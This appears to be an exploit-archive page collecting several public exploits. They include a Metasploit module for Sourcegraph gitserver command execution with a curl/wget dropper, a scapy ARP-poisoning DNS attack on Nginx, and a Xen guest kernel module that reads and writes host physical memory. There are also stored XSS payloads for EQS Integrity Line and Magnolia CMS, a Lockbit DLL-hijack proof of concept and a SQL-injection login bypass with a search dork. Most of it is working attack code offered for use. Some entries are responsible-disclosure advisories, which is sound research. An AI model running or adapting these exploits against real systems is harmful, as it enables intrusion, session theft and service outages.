Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Sourcegraph gitserver sshCommand RCE', 'Description' => %q{ A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the commands that are able to be executed through the git exec REST API. }, 'Author' => [ 'Altelus1', # github PoC 'Spencer McIntyre' # metasploit module ], 'References' => [ ['CVE', '2022-23642'], ['URL', 'https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9'], ['URL', 'https://github.com/Altelus1/CVE-2022-23642'], ], 'DisclosureDate' => '2022-02-18', # Public disclosure 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory }, ], [ 'Linux Dropper', { 'Platform' => 'linux', # when the OS command is executed, it's executed twice which will cause some of the command stagers to # be corrupt, these two work even for larger payloads because they're downloaded in a single command 'CmdStagerFlavor' => %w[curl wget], 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper }, ] ], 'DefaultOptions' => { 'RPORT' => 3178 }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']), OptString.new('EXISTING_REPO', [false, 'An existing, cloned repository']) ]) end def check res = send_request_exec(Rex::Text.rand_text_alphanumeric(4..11), ['config', '--default', '', 'core.sshCommand']) return CheckCode::Unknown unless res if res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/ # this is the response if the target repo does exist, highly unlikely since it's randomized return CheckCode::Vulnerable('Successfully set core.sshCommand.') elsif res.code == 404 && res.body =~ /"cloneInProgress"/ # this is the response if the target repo does not exist return CheckCode::Vulnerable elsif res.code == 400 && res.body =~ /^invalid command/ # this is the response when the server is patched, regardless of if there are cloned repos return CheckCode::Safe end CheckCode::Unknown end def exploit if datastore['EXISTING_REPO'].blank? @git_repo = send_request_list.sample fail_with(Failure::NotFound, 'Did not identify any cloned repositories on the remote server.') unless @git_repo print_status("Using automatically identified repository: #{@git_repo}") else @git_repo = datastore['EXISTING_REPO'] end print_status("Executing #{target.name} target") @git_origin = Rex::Text.rand_text_alphanumeric(4..11) git_remote = "git@#{Rex::Text.rand_text_alphanumeric(4..11)}:#{Rex::Text.rand_text_alphanumeric(4..11)}.git" vprint_status("Using #{@git_origin} as a fake git origin") send_request_exec(@git_repo, ['remote', 'add', @git_origin, git_remote]) case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end def cleanup return unless @git_repo && @git_origin vprint_status('Cleaning up the git changes...') # delete the remote that was created send_request_exec(@git_repo, ['remote', 'remove', @git_origin]) # unset the core.sshCommand value send_request_exec(@git_repo, ['config', '--unset', 'core.sshCommand']) ensure super end def send_request_exec(repo, args, timeout = 20) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'exec'), 'method' => 'POST', 'data' => { 'Repo' => repo, 'Args' => args }.to_json }, timeout) end def send_request_list res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'list'), 'method' => 'GET', 'vars_get' => { 'cloned' => 'true' } }) fail_with(Failure::Unreachable, 'No server response.') unless res fail_with(Failure::UnexpectedReply, 'The gitserver list API call failed.') unless res.code == 200 && res.get_json_document.is_a?(Array) res.get_json_document end def execute_command(cmd, _opts = {}) vprint_status("Executing command: #{cmd}") res = send_request_exec(@git_repo, ['config', 'core.sshCommand', cmd]) fail_with(Failure::Unreachable, 'No server response.') unless res unless res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/ if res.code == 404 && res.get_json_document.is_a?(Hash) && res.get_json_document['cloneInProgress'] == false fail_with(Failure::BadConfig, 'The specified repository has not been cloned.') end fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.') end send_request_exec(@git_repo, ['push', @git_origin, 'master'], 5) end end </code></pre>

<pre><code># Exploit Title: Nginx 1.20.0 - Denial of Service (DOS) # Date: 2022-6-29 # Exploit Author: Mohammed Alshehri - https://Github.com/M507 # Vendor Homepage: https://nginx.org/ # Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0 # Version: 0.6.18 - 1.20.0 # Tested on: Ubuntu 18.04.4 LTS bionic # CVE: CVE-2021-23017 # The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn # python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1 # The service needs to be configured to use Nginx resolver from scapy.all import * from multiprocessing import Process from binascii import hexlify, unhexlify import argparse, time, os def device_setup(): os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward") os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP") def ARPP(target, dns_server): print("[*] Sending poisoned ARP packets") target_mac = getmacbyip(target) dns_server_mac = getmacbyip(dns_server) while True: time.sleep(2) send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0) send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0) def exploit(target): print("[*] Listening ") sniff (filter="udp and port 53 and host " + target, prn = process_received_packet) """ RFC schema 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | LENGTH | ID | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Q| OPCODE|A|T|R|R|Z|A|C| RCODE | QDCOUNT | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | ANCOUNT | NSCOUNT | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | ARCOUNT | QD | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | AN | NS | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | AR | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Fig. DNS """ def process_received_packet(received_packet): if received_packet[IP].src == target_ip: if received_packet.haslayer(DNS): if DNSQR in received_packet: print("[*] the received packet: " + str(bytes_hex(received_packet))) print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build()))) try: # \/ the received DNS request dns_request = received_packet[DNS].build() null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12) print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index]))) print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:]))) payload = [ dns_request[0:2], b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00", dns_request[12:null_pointer_index+1], dns_request[null_pointer_index+1:null_pointer_index+3], dns_request[null_pointer_index+3:null_pointer_index+5], b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10", b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41", b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41", b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04" ] payload = b"".join(payload) spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\ UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\ payload) print("[+] dns answer: "+str(hexlify(payload))) print("[+] full packet: " + str(bytes_hex(spoofed_pkt))) sendp(spoofed_pkt, count=1) print("\n[+] malicious answer was sent") print("[+] exploited\n") except: print("\n[-] ERROR") def main(): global target_ip parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", help="IP address of the target") parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target") args = parser.parse_args() target_ip = args.target dns_server_ip = args.dns_server device_setup() processes_list = [] ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip)) exploitProcess = Process(target=exploit,args=(target_ip,)) processes_list.append(ARPPProcess) processes_list.append(exploitProcess) for process in processes_list: process.start() for process in processes_list: process.join() if __name__ == '__main__': target_ip = "" main() </code></pre>

<pre><code>Xen: PV guest on non-SELFSNOOP CPUs can validate non-coherent L2 pagetable [I'm not sure whether there are any major users of (unshimmed) Xen PV left, but https://xenbits.xen.org/docs/unstable/support-matrix.html says it's still a security-supported usecase for 64-bit guests.] [Tested on Debian's Xen version 4.14.4-pre (Debian 4.14.3+32-g9de3671772-1~deb11u1)] On CPUs without SELFSNOOP support (which I think essentially means \"AMD CPUs\" nowadays?), a Xen PV domain that has access to a PCI device (which grants the domain the ability to set arbitrary cache attributes on all its pages) can trick Xen into validating an L2 pagetable that contains a cacheline that is marked as clean in the cache but actually differs from main memory. After the pagetable has been validated, an attacker can flush the \"clean\" cacheline, such that on the next load, unvalidated data from main memory shows up in the pagetable. The L2 pagetable validation path (promote_l2_table()) can be attacked with this because for zeroed PTEs, it only reads and doesn't write. The L1 pagetable validation path (promote_l1_table()) seems to always write to memory in the C code, but the compiler could conceivably elide that write, making the attack possible against that path, too - I haven't checked what compilers actually do there. Thinking further, it might also be a good idea to check the Memory Sharing code, although that isn't security-supported anyway. (The same attack might also be possible without a PCI device if an HVM/PVH domain is collaborating with the PV domain - from what I can tell, HVM/PVH can always control their cache attributes, and pages with incoherent cache state could then be freed to Xen's page allocator and reallocated by the PV domain, unless opt_scrub_domheap is set?) I made a little reproducer that can be loaded as a kernel module inside a PV guest with PCI passthrough. It gives you a new device /dev/physical_memory using which you can just read and write all physical memory. For example, you can scan around for interesting strings: root@pv-guest:~/incoherent_page_table# strings -20 -td /dev/physical_memory [...] 146006071 auth requisite pam_nologin.so 146006107 # Load environment from /etc/environment and ~/.pam_environment 146006171 session required pam_env.so readenv=1 146006214 session required pam_env.so readenv=1 envfile=/etc/default/locale 146006286 @include common-auth 146006308 -auth optional pam_gnome_keyring.so 146006346 @include common-account Looking at that closer, we can dump the whole page and see that it looks like a pagecache page of a PAM config file from dom0: root@pv-guest:~/incoherent_page_table# dd if=/dev/physical_memory bs=1 count=4096 skip=146006016 #%PAM-1.0 # Block login if they are globally disabled auth requisite pam_nologin.so [...] Then we can clobber it by just dd'ing into it: root@pv-guest:~/incoherent_page_table# echo -n '##CLOBBER##' | dd of=/dev/physical_memory bs=1 seek=146006046 11+0 records in 11+0 records out 11 bytes copied, 0.00109982 s, 10.0 kB/s root@pv-guest:~/incoherent_page_table# And checking from a dom0 shell, the file contents of this config file in dom0 have indeed changed: root@jannh-amdbox:/home/user# head -n5 /etc/pam.d/lightdm #%PAM-1.0 # Block login if th##CLOBBER##ally disabled auth requisite pam_nologin.so root@jannh-amdbox:/home/user# This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-06-06. ====== Reproducer code ====== root@pv-guest:~/incoherent_page_table# cat incoherent_page_table.c #include <linux/module.h> #include <linux/kernel.h> #include <linux/vmalloc.h> #include <linux/set_memory.h> #include <linux/mm.h> #include <linux/miscdevice.h> #include <asm/cacheflush.h> #include <asm/tlbflush.h> #include <asm/io.h> #include <asm/xen/hypercall.h> #include <asm/xen/page.h> /* first entry in the last L3 pagetable */ #define MAPPING_TARGET_ADDR 0xffffff8000000000UL static unsigned long *controlled_l1_pte; static void __tlb_flush_everything_local(void *info) { __flush_tlb_all(); } static void tlb_flush_everything(void) { on_each_cpu(__tlb_flush_everything_local, NULL, 1); } static ssize_t physmem_rw(char __user *buf, size_t len, loff_t *offp, int is_write) { ssize_t ret = len; while (len != 0) { unsigned long offset_in_page = (*offp) & 0xfff; size_t chunk_len = min_t(size_t, len, 0x1000 - offset_in_page); void *mapped_addr = (void*)(MAPPING_TARGET_ADDR + offset_in_page); pr_warn(\"physmem_rw() iteration: len=%lu, off=%lu, chunk_len=%lu\ \", (unsigned long)len, (unsigned long)*offp, (unsigned long)chunk_len); if (signal_pending(current)) return -ERESTARTSYS; WRITE_ONCE(*controlled_l1_pte, ((unsigned long)(*offp) & ~0xfffUL) | _PAGE_PRESENT | _PAGE_RW | _PAGE_USER); tlb_flush_everything(); if (is_write) { *(volatile char *)mapped_addr = 0; // for debugging if (copy_from_user(mapped_addr, buf, chunk_len)) ret = -EFAULT; } else { *(volatile char *)mapped_addr; // for debugging if (copy_to_user(buf, mapped_addr, chunk_len)) ret = -EFAULT; } WRITE_ONCE(*controlled_l1_pte, 0); tlb_flush_everything(); buf += chunk_len; len -= chunk_len; (*offp) += chunk_len; } return ret; } static ssize_t physmem_read(struct file *file, char __user *buf, size_t len, loff_t *offp) { return physmem_rw(buf, len, offp, 0); } static ssize_t physmem_write(struct file *file, const char __user *buf, size_t len, loff_t *offp) { return physmem_rw((char __user *)buf, len, offp, 1); } static loff_t my_llseek(struct file *file, loff_t offset, int whence) { switch (whence) { case SEEK_CUR: offset += file->f_pos; fallthrough; case SEEK_SET: file->f_pos = offset; return file->f_pos; default: return -EINVAL; } } static const struct file_operations physmem_fops = { .owner = THIS_MODULE, .read = physmem_read, .write = physmem_write, .llseek = my_llseek }; static struct miscdevice physmem_miscdev = { .minor = MISC_DYNAMIC_MINOR, .name = \"physical_memory\", .fops = &physmem_fops }; static struct page *incoherent_page; static int init_test(void) { struct page *bogo_l1_page_table; void *wc_mapping; pte_t *linear_mapping_ptep; int level; pgd_t *pgd = pgd_offset(current->mm, MAPPING_TARGET_ADDR); p4d_t *p4d = p4d_offset(pgd, MAPPING_TARGET_ADDR); pud_t *pud = pud_offset(p4d, MAPPING_TARGET_ADDR); int update_res; struct mmu_update mmu_update_req; pr_warn(\"starting incoherent_page_table test\ \"); pr_warn(\"old pud: 0x%lx\ \", *(unsigned long *)pud); if (*(unsigned long *)pud != 0) { pr_warn(\"refusing to clobber existing pte\ \"); return -EBUSY; } /* allocate a zeroed page, and create a WC mapping of it in vmalloc space */ incoherent_page = alloc_page(GFP_KERNEL | __GFP_ZERO | __GFP_NOFAIL); wc_mapping = vmap(&incoherent_page, 1, 0, pgprot_writecombine(PAGE_KERNEL)); if (!wc_mapping) { pr_warn(\"vmap() failed\ \"); return -EFAULT; } /* allocate a zeroed L1 pagetable (but don't tell Xen we're going to use it * that way) */ bogo_l1_page_table = alloc_page(GFP_KERNEL | __GFP_ZERO | __GFP_NOFAIL); controlled_l1_pte = page_address(bogo_l1_page_table); /* reset Xen's internal mapping of the page to normal */ set_pages_uc(incoherent_page, 1); set_pages_wb(incoherent_page, 1); /* make sure the page's first line is cached but not dirty */ clflush_cache_range(page_address(incoherent_page), PAGE_SIZE); *(volatile char *)page_address(incoherent_page); mb(); /* THIS IS WHERE THE MAGIC HAPPENS: * sneak past the cache and put a PTE in the page */ *(pmd_t*)wc_mapping = __pmd((virt_to_machine(controlled_l1_pte).maddr | _PAGE_TABLE)); mb(); /* get rid of all our writable mappings */ vunmap(wc_mapping); linear_mapping_ptep = lookup_address((unsigned long)page_address(incoherent_page), &level); if (level != PG_LEVEL_4K) { pr_warn(\"level != PG_LEVEL_4K\ \"); return -EFAULT; } set_pte(linear_mapping_ptep, pte_wrprotect(*linear_mapping_ptep)); /* Let Xen validate the incoherently clean cache contents. * We rely on Xen only *reading* the entries for validating them, not writing * them back. * Don't use set_pud() here because we want to see the return value. */ mmu_update_req.ptr = virt_to_machine(pud).maddr | MMU_NORMAL_PT_UPDATE; mmu_update_req.val = virt_to_machine(page_address(incoherent_page)).maddr | _PAGE_TABLE; update_res = HYPERVISOR_mmu_update(&mmu_update_req, 1, NULL, DOMID_SELF); pr_warn(\"load 1: 0x%lx\ \", *(unsigned long *)page_address(incoherent_page)); clflush_cache_range(page_address(incoherent_page), PAGE_SIZE); pr_warn(\"load 2: 0x%lx\ \", *(unsigned long *)page_address(incoherent_page)); pr_warn(\"mmu_update returned %d\ \", update_res); if (update_res < 0) return -EUCLEAN; if (misc_register(&physmem_miscdev)) { pr_warn(\"misc_register failed\ \"); return -EFAULT; } pr_warn(\"enjoy your physical memory read/write!\ \"); pr_warn(\"controlled_l1_pte = 0x%lx\ \", (unsigned long)controlled_l1_pte); return 0; } static void exit_test(void) { misc_deregister(&physmem_miscdev); WRITE_ONCE(*controlled_l1_pte, virt_to_machine(page_address(incoherent_page)).maddr | _PAGE_PRESENT | _PAGE_RW | _PAGE_USER); tlb_flush_everything(); *(unsigned long *)(MAPPING_TARGET_ADDR) = 0; tlb_flush_everything(); } module_init(init_test); module_exit(exit_test); MODULE_LICENSE(\"GPL v2\"); root@pv-guest:~/incoherent_page_table# cat Makefile KDIR ?= /lib/modules/`uname -r`/build default: $(MAKE) -C $(KDIR) M=$$PWD root@pv-guest:~/incoherent_page_table# Related CVE Numbers: CVE-2022-26364. Found by: jannh@google.com </code></pre>

<pre><code>EQS Integrity Line: Multiple Vulnerabilities Name Multiple Vulnerabilities in EQS Integrity Line Systems Affected EQS Integrity Line through 2022-07-01 Severity High Impact (CVSSv2) High 8.8/10, score: (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) Vendor EQS Group AG (https://www.eqs.com/) Advisory http://www.ush.it/team/ush/advisory-eqs-integrity-line/eqs_integrity_line.txt Authors Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it) Date 20220706 I. BACKGROUND EQS Integrity Line is a proprietary whistleblowing software which enables employees to report misconduct such as corruption, abuses of power and discrimination internally before complaints become public and, in serious cases, result in financial losses as well as reputational damage. II. DESCRIPTION Multiple Vulnerabilities exist in EQS Integrity Line software. The present advisory highlights two distinct vulnerabilities, namely (A) XSS Vulnerability (stored) [CVE-2022-34007] and (B) Use of GET Request Method With Sensitive Query Strings [CWE-598]. III. ANALYSIS A) XSS Vulnerability (stored) [CVE-2022-34007] EQS Integrity Line through 2022-07-01 allows a stored XSS via a crafted whistleblower entry. In order to exploit this vulnerability no account is required on the whistleblowing software. The vulnerability resides in the whistleblowing questionnaire implementation that enables anonymous, non authenticated, users to inject malicious XSS vectors due to missing or improper input sanitization. Also content security policies (CSP) that could prevent or limit the attack are absent. The vulnerability is present on the whistleblowing form, and can be triggered using the following example input: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- <img src= onerror=alert(document.cookie)> --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Due to the vulnerability, an attacker posing as a whistleblower could upload an XSS vector in the submission form loading malicious code to be reflected and executed in the context of the browser session of the Recipient of the submission, that is typically an Anticorruption Officer or an Internal Auditor. Being able to execute code in the context of the target, and due to the absence of additional mitigations (e.g. the HttpOnly flag for cookies) the attacker could possibly obtain a copy of the target session cookie useful to impersonate and operate in place of the target user and execute automated operations on behalf of the target user by accessing all the reports present on the system or possibly impact the integrity of the system by deleting reports or interfering with ongoing communications with a real whistleblower. In short: a standard XSS attack scenario. The test for the presence of this vulnerability has been performed on the first input only, to not risk to cause any damage to the application. It is advised to execute a proper complete audit of the application with respect to this kind of vulnerability. The vulnerability was first identified performing an independent security audit to evaluate and ensure the security of the EU Sanctions Whistleblower Tool of the European Commission enabling whistleblowers to report possible violation of EU sanctions hosted at: https://eusanctions.integrityline.com/ B) Use of GET Request Method With Sensitive Query Strings [CWE-598] EQS Integrity Line through 2022-07-01 leaves sensitive traces in the browser history of whistleblowers using the application and possibly in the logs of other network appliances involved in the communication. When a whistleblower makes a submission, the system assigns a unique identifier to the submission and enables to choose a pin that is intended to be used by users in combination with the unique identifier to access the system in order to communicate with the recipients of their own report. The implementation of the session makes use of GET variables that include the unique identifier in the navigated URL to access the report. Such an implementation is prone to sensible information leakage making it possible for an auditor accessing the browser history of the whistleblower's device to clearly identify the evidence of a performed submission. It is advised to perform full review of the application to get sure that the application reduces the sensible traces left in the browser history of the user. IV. WORKAROUND The vendor has fixed the XSS and implemented a CSP in date 2022-07-01 V. CVE INFORMATION XSS Vulnerability (stored) [CVE-2022-34007] Use of GET Request Method With Sensitive Query Strings [CWE-598] VI. DISCLOSURE TIMELINE 20220617 USH: Bugs discovered 20220617 USH: Contacted Mitre for CVE Assignment 20220621 USH: First vendor contact (Lorenzo Trevisiol, Laura Santeusanio) 20220622 USH: Advisory provided to the vendor (Goran Kozomara) 20220701 Vendor response: XSS confirmed and CSP implemented (Marco Ermini) The vendor does not acknowledge the second reported vulnerability in the specific context of use but has planned future improvement the application of the application replacing the GET request with a POST request. 20220701 USH: The team confirms prompt and effective remediation of the XSS vulnerability but points out suboptimal CSP implementation. The implementation seems to involve a central proxy or device and to always include a list of 10 vendor clients and other third parties CDN probably used for other reasons different from the audited integrity line app (e.g. bootstrap CDN). The team advises to implement a policy per-site and app to avoid listing sensible resources and limit any possible exposure. 20220701 Advisory release scheduled for 20220706 20220706 Advisory released VII. REFERENCES [1] EQS Integrity Line: Multiple Vulnerabilities http://www.ush.it/team/ush/advisory-eqs-integrity-line/eqs_integrity_line.txt VIII. CREDIT Giovanni Pellerano, is credited with the discovery of this vulnerability. Giovanni Pellerano web site: http://www.ush.it/ mail: evilaliv3@ush.it IX. LEGAL NOTICES Copyright (c) 2022 Giovanni Pellerano Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. </code></pre>

<pre><code># Exploit Title: Magnolia CMS <= 6.2.19 - Stored Cross-Site Scripting (XSS) # Date: 08/05/2022 # Exploit Author: Giulio Garzia 'Ozozuz' # Vendor Homepage: https://www.magnolia-cms.com/ # Software Link: https://nexus.magnolia-cms.com/service/local/repositories/magnolia.public.releases/content/info/magnolia/bundle/magnolia-community-demo-webapp/6.2.19/magnolia-community-demo-webapp-6.2.19-tomcat-bundle.zip # Version: 6.2.19 # Tested on: Linux, Windows, Docker # CVE : CVE-2022-33098 Explanation Malicious user with the permissions to upload profile picture for a contact, can upload an SVG file containing malicious JavaScript code that will be executed by anyone opening the malicious resource. ===== REQUEST ===== POST /magnoliaAuthor/.magnolia/admincentral/APP/UPLOAD/0/140/action/cba61868-b27a-4d50-983d-adf48b992be1 HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------399178799522967017241464837908 Content-Length: 620 Connection: close Cookie: csrf=_WLVhBj-Vv-sdc37C4GBahMJ1tPS_7o_Y1VCEEw18Ks; JSESSIONID=F2678A586264F811C2746E4138BEF34D Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin -----------------------------399178799522967017241464837908 Content-Disposition: form-data; name="140_file"; filename="xss.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert('POC - Magnolia CMS'); </script> </svg> -----------------------------399178799522967017241464837908-- </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/38745539b71cf201bb502437f891d799_B.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Ransom Lockbit 3.0 Vulnerability: Code Execution Description: The ransomware apparently now requires a password to execute as noted by "@vxunderground" E.g. "-pass db66023ab2abcb9957fb01ed50cdfa6a". Lockbit looks for and executes DLLs in its current directory. Therefore, we can hijack a vuln DLL in this case "RstrtMgr.dll", execute our own code and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment. Family: Lockbit Type: PE32 MD5: 38745539b71cf201bb502437f891d799 Vuln ID: MVID-2022-0621 Disclosure: 07/04/2022 Video PoC URL: https://www.youtube.com/watch?v=tAXrRcsnzjY Exploit/PoC: 1) Compile the following C code as "RstrtMgr.dll" 2) Place the DLL in same directory as Lockbit 3.0 3) Optional - Hide it: attrib +s +h "RstrtMgr.dll" 4) Run Lockbit 3.0 {04830965-76E6-6A9A-8EE1-6AF7499C1D08}.exe -k LocalServiceNetworkRestricted -pass db66023ab2abcb9957fb01ed50cdfa6a #include "windows.h" //By malvuln - 7/4/2022 //Purpose: RCE in Lockbit 3.0 ransomware //MD5: 38745539b71cf201bb502437f891d799 //gcc -c RstrtMgr.c -m32 //gcc -shared -o RstrtMgr.dll RstrtMgr.o -m32 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){ switch (reason) { case DLL_PROCESS_ATTACH: MessageBox(NULL, "Ransom Lockbit 3.0 aka LockShit\nPWNED by Malvuln", "Code Exec PoC", MB_OK); TCHAR buf[MAX_PATH]; if(GetCurrentDirectory(MAX_PATH, buf)) if(strcmp("C:\\Windows\\System32", buf) != 0){ HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid()); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); } } break; } return TRUE; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>==================================================================================================================================== | # Title : Advanced Testimonials Manager v5.6 Auth by pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : https://codecanyon.net/item/advanced-testimonials-manager/113257?s_rank=194 | | # Dork : Advanced Testimonial Manager | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : user & pass = ' or 1=1 limit 1 -- -+ [+] http://127.0.0.1/testimonials/admin/index.php ==Greetings to :========================================================================================================================= | | | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* thelastvvv *Zigoo.eg * moncet | | | ========================================================================================================================================= </code></pre>